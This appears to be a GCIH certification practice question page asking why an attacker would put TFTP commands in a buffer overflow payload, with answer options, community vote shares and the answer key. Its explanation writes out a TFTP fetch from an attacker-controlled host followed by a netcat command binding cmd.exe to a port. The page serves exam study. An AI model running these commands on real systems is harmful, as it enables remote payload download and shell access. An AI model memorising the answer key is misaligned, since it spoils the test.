nerdexam
GIAC

GCIH · Question #615

What purpose would an attacker have for including TFTP commands in the payload of a buffer overflow exploit?

The correct answer is B. To retrieve a malicious executable from the attacker's system. If an attacker discovers a buffer overflow that he or she can trigger remotely, the attacker could overflow the buffer and have it execute the following commands: TFTP Remote_IPaddress (another machine the attacker controls) nc -l -p 8080 (or any other port I can get to) -e cmd.e

Vulnerability Exploitation & Privilege Escalation

Question

What purpose would an attacker have for including TFTP commands in the payload of a buffer overflow exploit?

Options

  • ATo run a brute force attack against the victim's administrator password
  • BTo retrieve a malicious executable from the attacker's system
  • CTo launch a port scan against the victim's internal network
  • DTo disable the victim's anti-virus and security software

How the community answered

(31 responses)
  • A
    3% (1)
  • B
    71% (22)
  • C
    19% (6)
  • D
    6% (2)

Explanation

If an attacker discovers a buffer overflow that he or she can trigger remotely, the attacker could overflow the buffer and have it execute the following commands: TFTP Remote_IPaddress (another machine the attacker controls) nc -l -p 8080 (or any other port I can get to) -e cmd.exe

Topics

#TFTP#buffer overflow payload#malware download#exploit staging

Community Discussion

No community discussion yet for this question.

Full GCIH Practice